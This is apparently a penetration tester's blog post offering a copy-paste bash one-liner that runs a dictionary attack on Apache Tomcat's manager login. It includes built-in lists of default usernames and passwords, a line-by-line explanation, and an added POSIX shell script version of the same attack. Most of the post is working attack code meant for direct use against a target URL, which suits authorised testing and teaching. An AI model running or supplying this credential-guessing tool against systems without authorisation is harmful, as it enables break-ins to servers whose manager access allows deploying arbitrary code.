
Tomcat default credentials dictionary attack [One-Liner]

Quick and Dirty one-liner to perform a dictionary attack against Tomcat manager.

There are many better and faster ways to perform this attack, such as using Burp or coding it in a proper scripting language (I have my own version in Python), but I'm a one-liner lover: I perform several pentests and I like to have one-liners I can just copy and paste instead of transferring scripts from one place to another. Below you can find some pros and cons.

Pros:

  • Just copy and paste it into a bash shell.
  • The only dependency is curl, which is normally installed by default on any Linux system.
  • Plain bash syntax.
  • Username and password dictionaries included (easily expanded).
  • HTTP and HTTPS support.
  • The code can be modified to attack other HTTP basic authentication endpoints.
  • If supported by the terminal, the output is colored.

Cons:

  • Not too fast: one sequential request per guess.
  • Noisy and lockout-prone: the default Tomcat server.xml wraps the user realm in a LockOutRealm (5 failures lock the user out for 300 seconds), so a long password list against a single user will mostly run into the lockout and a correct password may be rejected while it lasts.

 

USERS=(admin tomcat Admin manager both root role1 role administrator) ; PASSWORDS=(admin tomcat password Password1 administrator s3cr3t manager root changethis password1 r00t role1 s3cret toor letmein 12345 123456 1234567890 12345678 P@ssw0rd P@ssw0rd1 qwerty) ; echo -e "\033[38;5;81mEnter the /manager/html URL\033[m\n" ; read -p "> " URL ; echo ; for u in "${USERS[@]}" ; do for pwd in "${PASSWORDS[@]}" ; do echo -ne "\033[33m[+]\033[m $u:$pwd" ; (curl -skLI "$URL" -u "$u:$pwd" | grep -qE '^HTTP/[0-9.]+ 200') && { echo -e "\t\033[1;32mSuccess\033[m" && kill -INT $$ ; } || echo ; done ; done

 

Example run: (screenshot not reproduced here)

Line disassembling:

If someone is interested in learning a little bit of shell scripting and how this line works, below you can find a quick explanation.

 

  • Creation of the USERS and PASSWORDS arrays that contain the dictionary of words to be tested. In bash an array is created like this: ARRAY=(value1 value2 valueN)
  • ANSI escape sequences: if supported by the terminal, you can color your output easily by having ‘echo‘ interpret escape sequences (the -e option enables this). The sequence is \033[VALUE1;VALUE2m or \e[VALUE1;VALUE2m (I'm using \033 to have some compatibility with Mac operating systems); VALUE is the number of the format attribute being applied, and \033[m resets it.
  • With the ‘read‘ command I prompt for a value and save it in the URL variable.
  • I create two nested for loops that iterate over the USERS and PASSWORDS arrays. All of an array's values are read with the "${ARRAY[@]}" syntax (quoted, so values containing spaces stay intact).
  • Then some more colored debug printing.
  • I use the ‘curl‘ command with some options: -s silent (no progress output), -k ignore bad TLS certificates (ignored if the URL is not HTTPS), -L follow redirects, -I do a HEAD request instead of GET, -u HTTP basic credentials in username:password format. Then I look for a 200 status line with grep, which tells me the credentials are correct. I match the status line as ‘^HTTP/[0-9.]+ 200‘ rather than the literal text ‘200 OK‘ because Tomcat 8.5 and later send no reason phrase (‘HTTP/1.1 200 ‘) and HTTP/2 responses look like ‘HTTP/2 200‘. All of this runs in a subshell inside ‘()‘.
  • I check the exit status of the last command, which is that of the subshell: if it succeeded (&&) I print a message and stop the process; if it failed (||) I just print a newline (echo).
  • As an additional note, I break out of the nested loops with ‘kill -INT $$‘ inside ‘{}‘, which sends SIGINT to the current shell and aborts the whole line. I can't use ‘break‘ inside the parentheses because that is a subshell running in a child process, and a plain ‘break‘ would only leave the inner loop. (‘break 2‘ inside the ‘{}‘ group would also leave both loops, since the braces run in the current shell.) All of this is a consequence of how the line is interpreted as a single chain of && and ||.
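The same attack as a short POSIX shell script instead of a one-liner, as an added example (this is not the post's own code). It moves the "did the login work" check into its own function that reads the last status line of curl's header output, so a redirect hop followed by a 401, or a status line without a reason phrase, does not fool it, and that function can be exercised offline on captured header dumps. The user and password lists are shortened and constructed here; extend them from the arrays above. The hostname in the usage line is a placeholder.

```shell
#!/bin/sh
# Added example, not the original post's one-liner: the same dictionary attack as a
# small POSIX shell script whose success check lives in its own function, so the
# check can be exercised offline on captured header dumps. Only dependency: curl.

# Status code of the LAST status line in a `curl -I` header dump. With -L curl prints
# one header block per hop, so a 302 on the first hop must not be mistaken for the
# final answer. Works for "HTTP/1.1 200 OK", Tomcat's reason-phrase-less
# "HTTP/1.1 200 " and HTTP/2's "HTTP/2 200". Prints nothing if no status line is found.
last_status() {
  printf '%s\n' "$1" | tr -d '\r' \
    | grep -E '^HTTP/[0-9.]+ [0-9]{3}' | tail -n 1 | cut -d ' ' -f 2
}

# True (exit 0) when the header dump means the credentials were accepted.
auth_ok() {
  [ "$(last_status "$1")" = 200 ]
}

# Dictionary attack against a Tomcat manager URL, e.g. https://target:8443/manager/html
# ("target" is a placeholder). Word lists are shortened, constructed samples; extend
# them like the one-liner's USERS/PASSWORDS. Prints the first working pair and returns
# 0; returns 1 when nothing worked. --max-time keeps a stalled host from hanging the
# loop. A default Tomcat server.xml wraps the realm in a LockOutRealm (5 failures lock
# the user for 300 s), so later guesses against the same user may be rejected even
# when the password is right.
tomcat_dict_attack() {
  url="$1"
  users="admin tomcat manager"
  passwords="admin tomcat s3cret"
  for u in $users; do
    for p in $passwords; do
      headers=$(curl -skLI --max-time 10 -u "$u:$p" "$url")
      code=$(last_status "$headers")
      printf '[+] %s:%s -> %s\n' "$u" "$p" "${code:-no response}"
      if [ "$code" = 200 ]; then
        printf 'Success: %s:%s\n' "$u" "$p"
        return 0
      fi
    done
  done
  return 1
}

# Usage: ./tomcat_dict.sh https://target:8443/manager/html
if [ "$#" -eq 1 ]; then
  tomcat_dict_attack "$1"
fi
```

Because last_status only looks at the final status line, a 302 to a login page or a 401 after a redirect is reported as exactly that instead of being silently counted as a miss, and a host that does not answer shows up as "no response" rather than as a failed guess.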

 

That's it; hopefully you find this as useful as I do.

@hecky
